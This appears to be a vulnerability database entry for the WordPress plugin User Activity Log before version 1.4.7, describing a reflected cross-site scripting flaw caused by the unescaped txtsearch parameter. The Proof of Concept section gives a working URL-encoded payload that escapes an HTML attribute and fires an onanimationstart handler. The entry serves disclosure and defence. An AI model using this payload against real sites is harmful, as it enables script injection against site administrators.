WordPress Plugin Vulnerabilities
User Activity Log < 1.4.7 - Reflected Cross-Site Scripting
Description
The plugin does not escape the txtsearch parameter before outputting it in an attribute, leading to a Reflected Cross-Site Scripting issue
Proof of Concept
https://example.com/wp-admin/admin.php?page=user_action_log&txtsearch=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS%2F%29%2F%2F
Affects Plugins
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Submitter
Jin An
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-08-30 (about 2 years ago)
Added
2021-08-30 (about 2 years ago)
Last Updated
2021-08-30 (about 2 years ago)